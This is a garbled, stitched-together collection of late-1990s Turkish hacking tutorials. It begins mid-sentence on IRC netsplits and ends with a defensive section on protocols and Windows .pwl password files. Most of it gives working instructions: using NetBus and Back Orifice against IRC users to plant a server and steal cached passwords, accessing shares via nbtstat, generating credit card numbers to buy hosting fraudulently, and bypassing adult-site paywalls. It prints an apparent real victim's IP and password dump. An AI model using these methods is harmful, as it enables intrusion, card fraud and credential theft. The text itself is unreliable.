(türkiyeye en yakýn Dalnet
serverý . Serverlar da sonuçta bilgisayardýr, tabi çok güçlü
ve
kapasiteli aletlerdir. Bir serverýn arýza yapmasý,
o servera baðlý
kimseleri doðrudan etkiler. Tabii ki bir
netin tüm serverlarý birbirlerine baðlýdýr.
Zaten
Internet Relay Chat (IRC) kelimeleri de burdan gelir. Þimdi gelelim
bizim netsplit olayýna.
Bazen kötü hava koþullarý,
teknik problemler vs gibi nedenlerle serverlarýn arasýndaki
bað
kopar. O zaman network bölünmüþ olur ve senin
tarafýndakiler için karþýdakiler
düþmüþtür.
Bu yüzden de yüzlerce kiþi quit msg verir ve
kanallar boþalýr. Ancak ayný þekilde,
karþý
taraftakiler de senin tarafýndakilerin
düþtüðünü zanneder. Yani aslýnda kimse düþmez.
Net
bölünmüþ olur. Ýki taraf da birbirini göremez. Ve sen
karþý tarafdakileri
düþtü sanarken, onlar da senin
tarafýndakilerin düþtüðünü zanneder. Ne zaman netsplit
olsa
baþta IRCop'lar olmak üzere yetkili kiþiler tamirata
baþlar, hasarlar gerek içerden, gerek
dýþardan
giderilir ve 2-3 dakika içinde net gene birleþir. O zaman da sen
karþý
taraftakilerin geri geldiðini, onlar da sizin
taraftakilerin geri geldiðini görecektir. Tabii aslýnda
kimse
geri gelmiyor, sadece net tekrar birleþiyor Netsplit
olduðunda quit mesajlarýnýn
yanýnda
baðlantýsý kesilen serverlar yazar.
Ör : ***Ali has quit IRC
(stlouis.mo.us.dal.net
toronto.on.ca.dal.net)
Ancak bazen gerçekten
disconnect olursunuz. Yani ayný anda yüzlerce kiþi
gerçekten
düþer ve tekrar baðlanmak zorunda kalýr. Bunun nedeni ise
þu: Daha
önce de bahsettiðim gibi, serverlar da sonuçta birer
bilgisayardýr. Onlara da çeþitli programlar
yüklenmiþ,
onlarýn da içinde anakart, disk vs gibi araçlar var. Bu yüzden
bazen serverlar göçer,
yani içindeki software bozulmuþ olabilir, ya
da güç kaynaðý yanabilir. Böyle durumlarda, o
servera
baðlý olan bilgisayarlar da (senin, benim bilgisayarým
gibi) netten düþer.
Yani gerçekten düþer. O zaman IRC'ye
yeniden baðlanmak gerekir.
Her split oluþunda
üflenip
püflenme, unutma ki, o anda onlarca kiþi problemi gidermek
için kafasýný çatlatýyor...
Anýnda
Hack
Bu yazýyý
okuduktan sonra sizde kesinlikle en az 3 dakikada, bir bilgisayara
girebileceksiniz.
Öncelikle aþaðýdaki programlarý
dowload ediniz. http://207.126.121.36/hack/texts/netdetect.zip">
Netbus-Detector mirc
addonu
Yukarýda
belirtilenleri temin ettikten sonra ava çýkabiliriz.
Yukarýda
belirtilen Netbus-Detector mirc addonunu Chat
programýnýzýn bulunduðu klasöre
açýn :
c:mirc (mesela). Daha sonra chat programýnýzý
çalýþtýrýn.
Ve status bölümünde
þunlarý yazýn :
/load -rs NetBus.mrc
=> yazýn
ve enter'a basýn
/load -rs Net-Aliases.mrc
=> yazýn ve enter'a basýn
/load
-rs BusScan.mrc
=> yazýn ve enter'a basýn
Bunlarý her
yazýþýnýzdan
sonra
Loaded script
'c:mircnetbus.mrc
gibi bir yazýyla
karþýlaþýrsanýz
bu iþ oldu
demektir. Chate girin mesela irc.dal.net'teki #zurna kanalý
olabilir (Kanal ne kadar
büyük olursa o kadar iyi olur. Tabi ne kadar
fazla büyük kanala girerseniz o kadar iyi). Þimdi beklemeye
baþlayýn.
Neyi mi bekliyorsunuz? Kanala giren
kiþilerden netbus sheepi açýk olanlarýn size teslim
olmasýný.
Az önce yüklediðimiz mirc addonun
mantýðý kanala join olan kiþilerin 12345'inci
portunu
yoklayýp Netbus açýðý var mý
hýzlý bir þekilde
araþtýrmak.
Bulduðunda ise o anki nickiniz size özel açacak ve "Þu kanaldaki
þu
host/ip'li kiþide netbus sheepi bulunmuþtur." diyerek
size haber verecek. Sizde hemen ip'yi alacaksýnýz
ve
netbusdan baðlanacaksýnýz. O da ne karþý
bilgisayar þifre
korumalý. Hemen gaban'ý
çalýþtýrýp þifreyi deðiþtirin.
Daha
sonra Netbus'dan tekrar baðlanýn ve
karþýnýza gelen þifre
sorusuna az önce
belirttiðiniz þifreyi yazarak bilgisayarýna girin. Bu
kadar basit.
Nbtstat
Ile Karsi Pc yi Trojansiz Elegecirmek
Dos komut satirinda
nbtstat -A <IP adresi> komutunu veriyoruz. Basarili
Olmussak:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
^M0REBID
<00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC
Address = 44-45-53-54-00-00
gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir.
Bizim icin önemli
olan da bu.
c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz.
("Edit lmhosts" komutuyla) Eger ki
daha önceden lmhosts dosyasi varsa bile
yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi,
^MOREBID
bilgisayarin adi)
d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina
eklediklerimizi networkumuze
tanitiyoruz.
e- Simdi Windows'a dönme zamani. Baslat/Bul/Bilgisayarlar menusunden
UNIQUE adini vererek (Yukarida ekran
ciktisinda ^MOREBID <00> UNIQUE
Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler
yaptiktan sonra
bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift
tiklayip harddiskini görebiliyoruz.
Not: Bu olay kirmak istediginiz
ana bilgisayarin dosya paylasimina acik
olmasi durumunda calisir.
Bedava Domainmi almak istiyonuz?
Þu
sýralarda
internette çok popüler olan domain, server... olayýný
anlatacaðým.
Eðer internette yoðun olarak
warez,hack,adult tipi sitelere uðramakta iseniz,sizde bu iþi
merak
ediyorsunuz demektir. Bu yazýdan sonra eminim ki
merakýnýz büyük ölçüde azalacaktýr.
Warez, hack,
adult tipi siteler aþýrý derecede server
ihtiyacý duyarlar.
Yani bulunduklarý server ne kadar büyük
olursa o kadar daha fazla program, resim... gibi þeyler koyarak
hit
almak amacýndadýrlar. Günümüzde de domain, server... denen
þeylerin fiyatlarý
ortadadýr. Þimdi siz
diyeceksiniz : "Domain server gibi þeyler pahalý diyorsun
fakat
ortalýk domainden geçilmiyor. Önüne gelen domain, server
falan almýþ bu iþ nasýl
oluyor?".
Ýþte bizim esas konumuz da budur. Bu adamlar
serverlarý nasýl alýyorlar?
Para mý
veriyorlar? Yoksa baþka bir yol mu var?
1) Yukarýda
anlattýðým
olay her domain almýþ kiþi
için geçerli deðildir. Yani kendi parasýyla
warez serveri ya da
domain almýþ kiþiler vardýr.
2)
Aþaðýda
anlatacaðým olayý denemeniz
halinde baþýnýza gelebileceklerin
mesuliyeti tamamen
size aittir.
3) 2.Þýktan
korkup da yazýyý okumaktan
vazgeçmeyin. Çünkü
aþaðýda bu olayý en güvenli þekilde
nasýl
yapilabildiðini de anlattým. 4) Bedava domain ve
küçük bir server veren yer istiyorsanýz
www.webjump.com ya da
www.hypermart.net adresinden alabilirsiniz. Büyük bir server
istiyorsanýz aþaðýdaki yazýyý
okuyunuz.
Eveettt. Artýk
heyecanla beklenen an geldi. Fakat hack olayýndan önce
tedbirlerimizi almalýyýz
deðil mi? ) Ýlk olarak
analog bir hattan baðlanmaya çalýþýn.
Isp'nizi
arayarak isp'nizin analog hat telefon numarasýný
sorabilirsiniz. Daha sonra browser'ýnýzda
proxy
ayarlarýnýzý yapýn. Avrupa'da bulunan bir
proxy'yi kulllanmakta yarar
var. Bütün bunlarý yaptýktan
sonra bir sahte kredi kartý accsi bulmaya geldi sýra.
Elinize
babanýzýn veya annenizin kredi kartýný
alýn. Sahte kredi kartý
programýnýzý
çalýþtýrýn. Bu programlarý
nette
heryerde bulabilirsiniz. Eðer hiç görmedim diyorsanýz,
yazýnýn burdan
sonrasýný
okumayýnýz. Sahte Kredi Kartý programýndan
extrapolate
tuþuna basýn ve önünüze gelen boþ
kutucuða sahip olduðunuz kredi kartýnýzýn
numarasýný
yazýn. Daha sonra önünüze gelen
rakamlardan rastgele not edin. Bu arada kendi esas kredi
kartýnýzýn
son kullanma tarihini de not edin. Buraya
kadar baþarýyla geldiyseniz iþlemin birinci bölümü
bitmiþ
demektir. Hadi geçmiþ olsun.
Internette bir sürü
parayla domain, server... satan yerler vardýr.
Ýþte bu
adreslerden gazlamasý kolay olan bir adres vereceðim :
www.hostingdeals.com. Bu verdiðim adres gerçekten çok gaz bir yerdir.
Yani 300 MB'lik bir alaný kolay bir þekilde
elde
edebilirsiniz. Ýlla benim size verdiðim bu adresi kullanmak
zorunda deðilsiniz tabi
fakat gazlamaya bu kolay adresten
baþlarsanýz ilerde daha büyük kapasiteli yerlerde elde
edebilirsiniz.
Bu da sizin kabiliyetinize kalmýþ birþey
artýk. Ne demiþler : Önce
Emeklenir, Sonra Yürünür, Sonra
Koþulur... Az önce verdiðim adrese gidin ve sign up linkine
týklayýn.
Karþýnýza gelen pencereyi
mantýklý-sallama bilgilerle doldurun. En
önemlisi e-mail
adresinizi mutlaka doðru verin. Daha sonra devam edin.
Karþýnýza
1-2 pencere daha çýkacak
bunlarý da mantýklý-sallama bilgilerle doldurun. Bu
arada
verinizin yeteneklerini belirteceðiniz bir pencere gelecek
buradan hepsini iþaretleyin ne de olsa beleþ
server,
herþeyi tamam olsun deðil mi yani... Önemli : Fiyat Ödeme
Þekillerinden en sað
alt köþede olaný seçin.Sonra
en önemli pencere geliyoruz : Paranýn ödeneceði yer.
Ýsim
bölümüne zaten tikmen ismimiz yazýlýr. Çünkü
daha önce bu bilgiyi vermiþtik. Kredi kart
numarasý bölümüne
size daha önce not etmenizi istediðim numaralardan birini
yazýn. Son
kullanma tarihi bölümünü de size daha önce not etmenizi
istediðim son kullanma tarihini ay/yýl; formatýnda
yazarak
doldurun. Ve daha sonra done yapýp iþlemi bitirin.
300 MB'lik baba domain+serveriniz yaklaþýk
24 saat içinde
açýlacaktýr. Hepinize hayýrlý olsun.
Baþka yazýlarda
görüþmek dileðiyle...byez
byez...
ADULT SITE
HACK
INTERNETTE BIR SURU ADULT
SITESI VAR VE
HEPSIDE BAZI SCRIPTLER JAVALAR VEYA REFERRER
KULLANARAK BIRBIRINE LINK VERIYOR BEN BIR HACKER DEGILIM
AMA UFAK BAZI
IPUCLARI VEREBILIRIM
YAPMANIZ GEREKEN ILK IS BISEYLER YURUTMEK ISTEDIGINIZ SITENIN PASSWORD
UNUN ELDE
ETMEK
BUNUN ICIN BIR SURU PASSWORD SITELERI
VAR YA BUNLARDAN ELDE EDERSINIZ PASSWORDLERI TABI SABIR ISI BU BEN AZIM
ETTIM
BIR KAC TANE
BULDUM CALISAN PASSWORD BU SITE O SEKILDE YAPILMISTIR YADA TUM WAREZ
SITELERINDE CREDIT
MASTER 4 VE
CARD PRO GIBI PROGRAMLAR DAGITILIR BUNLARIN ISLEVI SIZE
HAZIRDA BAZI KREDI KARTI
NUMARALARI VERIRLER AMA
ELBETTE
KI BU VERDIKLERI NUMARALAR HICBIR ISE YARAMAZ YAPMANIZ GEREKEN
ONCELIKLE GERCEK BIR
KREDI KARTI BULMAKTIR VE BU KARTTAN
O PROGRAM VASITASIYLA NUMARALAR
URETMEKTIR BU
PROGRAMLAR SIZE 1000
TANE FALAN KART URETIR. ISIN ASIL PUF NOKTASI
SU, BU URETTIGINIZ KREDI
KARTLARI NIN HEPSININ
BITIS TARIHLERI AYNI BOYLECE ELINIZDEKI KARTI KULLANARAK SIFRE
ALABILIRSINIZ
FAKAT DIKKAT
HICBIR SEKILDE EMAIL YADA KENDINIZI BELLI EDECEK BILGI VERMEYIN SADECE
SANAL ISLERINIZI O
APTAL ADULT
SITELERINDEN PASSWORD ALMAK GIBI ISLERINIZI YAPIN BU
KESINLIKLE BIR SUC TESKIL
EDER SAKIN HERHANGI BIR MAL SIPARIS ETMEYIN
BIRINDEN ALDIGIM BILGIYE GORE
NEYSE KI ADULT
SITELERI BU KARTLARDAN PARA CEKEMEMEKTEDIR CUNKU USTLERINDEKI ISIMLER
TUTMAZ
BU IYI HABER
KIMSEYE ZARARINIZ YOK AMA BU ISI YAPMAYIN RISKI BUYUK.SAHTE ACCOUNT
KULLANMAYA DIKKAT EDIN.KIMLIK VERMEYIN
VEYA
www.anonymizer.com BU ADRESE
GIDIP BASVURUN IP
NUMARANIZI ONLAR SIZIN ICIN SAKLAYACAKLARDIR.
HERNEYSE BIR SITENIN PASSWORDUNU ELE
GECIRDIKTEN SONRA SITEDE ARKA KAPI
(YANI SIFRESIZ BIR
YER) VAR MI DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE
YAPIN TABI
SITEDEKI RESIMLERI
BULMAYA AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI
TELEPORT PRO
VASITASIYLA
CEKTIKTEN SONRA ELINIZLE
KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI
GENELDE SIFRELIDIR
SIFRELI
OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK
VERILMISSE MESELA SIZ
WWW.XXX.COM/MEMBERS TASINIZ ONLAR
WWW.YYY.COM GIBI BIR YERE LINK VERMISLER
ISE ORANIN
BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA
BUNLAR
REFERER
KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM
ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE
OLAN DOSYALARI
BULMAKTIR BUNLAR COK
BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI
SITELERINDEKI
BEDAVA
GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI
http://www.clubwicked.com/cgi-bin/stryseek.cgi? head=index.html
bu mesela sitenin ana sayfasini acar eger
http://www.clubwicked.com/cgi-bin/stryseek.cgi? head=cinemax.html
derdeniz sitenin sinema sayfasina gidersiniz vb bunun gibi sitedeki
adreslere bakarak dolasirsiniz.
BAZEN DE REFERER
KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O
ADRESTEN TIKLARSANIZ
GIRERSINIZ
BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN
DUNYANIN SEX SITELERI
AYAGINIZIN DIBINDE BAKIN MESELA SU
ADRES BIR ORNEK OLSUN
http://www.adultmagazine.com/cgi-bin/tv?page=1998/ 08/cover.html&ID=00409666
BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE
GIDIN SIZE MUTLAKA
INTERNAL
SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI
KANDIRIYO ADAM
GITMENIZ GEREKEN ADRES ASLINDA SU ISE TUM
FAZLALIKLARI ATALIM BU ADRESE
GIREMEDINIZ SIMDI
AYNI SAYFADA FAZLALILLARI ATALIM VE
SOYLE YAZALIM
http://www.adultmagazine.com/1998/08/cover.htmlcgi-bin i attim; /tv?page= i attim &ID=00409666 i attim boylece
sayfadayim
BAZI ADRESLER DE SIZIN NEREDEN
GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR
SAYFAYA GONDERMEYE
KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN
ONCE HEMEN
STOP A BASIN KI
O SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE
BAKARAK SIZI YA
PARA
ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE
BIZ STOP A BASIP
BIZI GONDERECEGI
GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA
http://www.missx.com/live/liv.cgi?ty...ame=pics2.htmlBU SAYFA SIZI HEMEN MEMBERS KLASORUNE ATMAYA CALISACAKTIR
HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE
TABI IKI UC KERE O
SAYFADA KALIN EEE SIMDI
NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM
http://www.missx.com/live/YAZDIGIMIZ ZAMAN 100BINLERCE RESIM KARSIMIZDA NOT:BU HERIFLER ACAIP
DONEKTIR BEN BU YAZIYI
YAZARKEN BU OLAY
CALISIYODU BU BIR ORNEKTIR LINKI
KAPAYABILIRLER
BILGISAYARA NASIL GIRILIR
Bu bolumde,
baskalarýnýn
bilgisayarýna girme ve internet
sifrelerini calma olaylarýný ogrenicez..
Ýlk
olarak bu olaylarý gerceklestirmek icin 4 adet programa
ihtiyacimiz var..Wingate,
Netbus,Bo, Telnet(her windowsun
icinde vardir)..Diger programlari
cehennemin
Ýlk olarak irc'de kendimize bir kurban secip, ip
numarasýný
alýyoruz (/dns nickname)..
Sonra wingate'i calýstýrýyoruz..
"Hostname or
Ip" yazan yere kurbanýmýzýn ip
numarasýný giriyoruz..
"Scan Port"
kýsmýnda 23 seklindeki rakamlarý 12345
yapýyoruz sonra asagýdan
3.
secenek olan try to open the port only" i secerek "scan!" butonuna
basýyoruz..
"Servers found" kýsmýnda
bir kac tane ip yazmasý
lazým sansa bir tanesini secin..
Sonra netbus'ý calýstýrýp
hostname/ip yazan
yere wingateden buldugunuz ipyi yazýn..
Sifre isterse telnetten sifreyi kýrmamýz
lazým..Eger
sifre istemezse isiniz kolay...
Ben sifre istedi varsayýyorum ve anlatmaya devam...
Telnet
her windowsta vardir...Bul (find) dan telnet'i buldurup
calýstýrýn...
Baglana gelip
uzaktaki sistem'e týklayýn...
Ana bilgisyar adý: wingatede buldugmuz ipyi yazýyoruz
Baglantý
Noktasý kýsmýna ise netbus portu olan
12345 yaziyoruz..baglana týklýyoruz..
yukarda
netbus 1.6 veya 1.7 yazar..
simdi sifreyi kirmak icin
Password;1;123 ServerPwd;anatolia
bu yazýyý
pasteliyoruz...ve sifre cehennem oluyor,siz
sifreyi
cehennem yerine baska bir seylerde yapabilirsiniz..
Sonra bir
daha netbus'a gidiyoruz artýk sifre anatolia
giriyoruz...Artýk adamýn
bilgisayrýndayýz..
file
manager'a gelerek adama boserve.exe yi yolluyoruz...nereye
yolliycagimizi soruyor..
c:windows yazarak windowsun altina
atiyoruz
yolladiktan sonra download ewkranýný kapiyoruz..
start program diyoruz...c:windowsboserve.exe
diyoruz...
tamam netbustaki isimizde bitti..
Þimdi Back Orifice'ye geçiyoruz
target host orta adamýn
ipsini yazýyoruz..yan tarafada
12345
yan taraftan system passwordsu secip send e basýyoruz ve
bingoooo
bu adýmda 10un ustunde password varmis..
Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm..
bu
arada adamdan cikan passler
** 0 ing host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host
194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
**
1 ystem passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337
---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19)
len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource:
'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06)
len:74(53/122)
Resource: '*RnaAT&T WorldNet
Service100000000@worldnet.att.net'
Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*RnaMicrosoft Internet Referral Serviceicwsignup'
Password:
'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*RnaTurk Nokta Netabaygan' Password: 'need-bob'
index:08(06)
len:38(25/52)
Resource: '*RnaTurk Nokta Netburak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rnasolamnýk'
Password: '*'
index:05(06) len:42(27/72)
Resource: '*RnaTurk Nokta Netnecatit' Password: 'eynesil"'
index:11(06)
len:34(19/62)
Resource: '*RnaAlnetersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*RnaBurakrbayraktar'
Password: '963963'
index:16(06) len:42(27/62)
Resource: '*RnaBaðlantým 5rbayraktar' Password: '963963.$'
index:17(06)
len:36(19/82)
Resource: '*RnaBurakr1056700' Password: 'DABmvsVG•('
index:18(06) len:40(19/122)
Resource: '*RnaBurakdoganalp'
Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rnanolur' Password: '$'
index:20(06) len:36(19/82)
Resource:
'*RnaBurakb1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*RnaAÝDATAsuen' Password:
'68913672$'
index:22(06) len:36(22/62)
Resource: '*RnaBaðlantým 4merko' Password: 'merko7.'
index:21(06)
len:46(25/122)
Resource: '*RnaBaðlantým 7 baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource:
'*Rnabayrakbaycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*RnaBurakburak' Password: 'burakì '
index:12(06)
len:30(16/62)
Resource: '*RnaAlnetmerko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rnacenkbaycenk'
Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource:
'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
------------------------- End
of Data -------------------
SAVUNMA
Acilis konusmasi ile olaya
baslayalim;boyle bir sayfa
yapma amacim kendini hacker sanan oysa sadece
elindeki bazi programlardan nuke atmaktan oteye gitmeyen
arkadaslara(Yani
Lamer'lara) karsi onlem almak.Her ne kadar bu
arkadaslar hacker olmasada bu arkadaslarin elindeki programlarin verdigi
zaralari
gos ardý etmemek gerek.
Oncelikle sik karsilastiginiz onemli
internet protokollerini aciklayalim IP internet
protocol)20 byte
dan olusan internetteki her seyin tasindigi veri iletisim
protokoludur.Diger protokollerin hepsi bu
protokolden tasinirve ve ip
nin sonuna eklenir.Ip nin icinde paket parcalama ofseti,izleyen protokolun
tipi,paketin
canli kalacagi sure,kaynak ip adresi,hedef ip adresi gibi
alanalr vardir TCP Transmission Control Protokul)TCP,ana uzunlugu
20
byte olan
www,e-mail,irc gibi internette en cok kullanilan iletisim protokoludur
ICMP internet control messaging protokol)bu
protokol teshis
etme ve mesejlasmayi iceririr.Bilgisayarlar arasindaki hat hizini ve
bilgisayarin
hatta olup olmadigini
anþamak icin kullanilir.Mesala ping komutu ile
bunu yapabilir ilerleyen bolumlerde bu ozelligi kullanarak hattan
dusmeyi
engelleyen bir program verecegim. IGMP internet group manegement
protokol)ismindende anlasildigi gibi bilgisayar
gruplarina bilgi alinip
gonderilmesini saglar.Ýnternet
uzerinde bir cok radyo bu protokolle yayin yapar.
Simdide
saldiri icin kullanilan temel acikliklari inceleyelim
IP'nin zayif noktalari:Ip'nin en buyuk acik noktasi gelen
ve giden
bilginin kaynaginin ve iceriginin kontrol edilmemesidir.Bu yolla yeterli
bir bilgi veya bazi programlarla bilgisayar
yanlis bilgi gonderile-
rek bilgisayara hack edilebilir veya bilgisayar kilitlenebilir. Network
topolojisinin zayif
noktalari:Eger network uzerinde anahtar
kullanmiyorsaniz gonderdiginiz bilgi tum aga ugrar.Bu durumdan belli bir
programlarla
yaralanalinilabilir.Ornegin bu yontemle ag uzerinde
sizin yaptiginiz butun gorusmeler izlenebilir
pwl : password
list
Kýsaca pwl(PassWord List)
dosyasýndan bahsetmek istiyorum. Bu dosya windows95/98'deki
tüm
cached ve kayýtlý password'lerin olduðu bir
dosyadýr. Yani kullanýcý
internete baðlanmak için
ISP þifresini yazacaktýr, bu þifre büyük ihtimalle
bilgisayarýn
hafýzasýnda yer edecektir ve .pwl
dosyasýnda da listelenecektir.
Bu dosya c:windows
dizini altýnda bulunur. Kullanýcý
adýnýn ilk 8 karakteri ve .pwl
uzantýsýndan
oluþur. Yani benim kullanýcý adým "PooLSharK"
ise
pwl dosyam "poolshar.pwl"dir. Hatta þimdi kendinizinkini bile
hemen bulabilirsiniz. Tek yapmanýz gereken
c:windows dizinine
gidip pwl dosyasýný bulmaktýr.
Çoðu password burada
listelenir. Ancak bir metin editörü (ör: notepad)
ile bu dosyayý açarsak içerisinde anlamsýz karakterlerden
baþka
birþey olmadýðýný görürürz.
Bunun nedeni ise þifrelerin belirli
bir algoritma ile kodlanarak
saklanmasýdýr. Evet aynen öyle, kullanýcý
þifreleri
þifrelenmiþ olarak bulunur. Yani .pwl
dosyasýnýn içindedir ancak anlaþýlýr
bir
þekilde deðildir zira aynen aþaðýdaki gibidir:
–c. . ....
.
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR. . .
. . Î. . . . . . ×. —.QDæù0”Á.æ.õˆí.ËÞ.„,{”¬M
.}.¤”[C.›.
e¬€âUwØ.ž°ÅR‚’'õ¦qbtÝózåºÝ²½.†
“ûžu¶Üš§òo+.*á.ó.…0ÏC...&127;ÆûéDŠ
.6dU˜:ù
ý.PsMS»V©EBʪ¡$ç¢Í!Õ.Ìßl±
â.Ž”Léa4o.•2±çu°
éŠ.Îw‡û^l—¹ˆ§`×vm™.v
“a×`ÔžÛ5AȨ.Ì{a2P–ñÚ
(Þifrenin
orjinalliðini bozmak
için onu biraz kýsalttým, normalde daha uzun)
Ancak birþey
eklemek istiyorum. Her zaman pwl
dosyasýný kýrmak iþe yaramayabilir. Yani içi
boþ
da olabilir. Bu demek olmuyor ki o kiþinin hiç
kayýtlý þifresi yok. Tabii var
ancak pwl
dosyasýna kaydedilmesine izin vermemiþ olabilir. Örnek olarak
superonline kullanýcýlarýnýn
çoðunun
kullandýðý Superonline Guide programýný
ele alalým.
Bu program sizi otomatik olarak internete baðlamaya
yarar ve bunun içinde kullanýcý adýnýz
ve
parolayý program içerisindeki bir bölümde girmeniz gerekir. Program
sizin parolanýzý
(þifrenizi) nete her
baðlanýþýnýzda ISP'nize iletecektir ve
internet
baðlantýsýný kurarken username, password
gibi alanlar ile ilgilenmenize gerek
kalmaz çünkü Superonline Guide bunu
sizin için yapar. Tamam yapar yapmasýna da nasýl yapar? Yani
bir
kere programa username ve pw'ümüzü veriyoruz, o biz ne zaman istesek
kullanýyor bizim için. Tamam ama, bilgisayarý
açýp
kapattýðýmýz zaman nasýl oluyor da bizim
pw'ler
uçup gitmiyor? Demek ki þifrelerin bir yerde
kayýtlý olmasý gerekli. Ýþte
bu
þifreler .pwl dosyasýnda saklanýyor. Program
þifreye ihtiyaç duyunca oradan
alýyor, kullanýyor.
Ancak daha demin dedim ki, pwl dosyasýnýn kýrmak
her
zaman þifrelerin açýða çýkmasýný
saðlamaz.
Eðer kullanýcý pw'lerini unutmamak için
veya sürekli pw girmekten býktýðý
için
yardýmcý bir program kullanmýyorsa (ör uperguide,
int.explorer'ýn pw
hatýrlatma özelliði vs) yani, her
seferinde þifrelerini elle giriyorsa, bilgisyarýn
diskini hiç
araya sokmuyorsa o zaman pw'ler pwl dosyasýna yazýlamaz.
Çünkü kullanýcý
onlarý biryere kaydettirmiyor. Her
seferinde el ile giriyor...
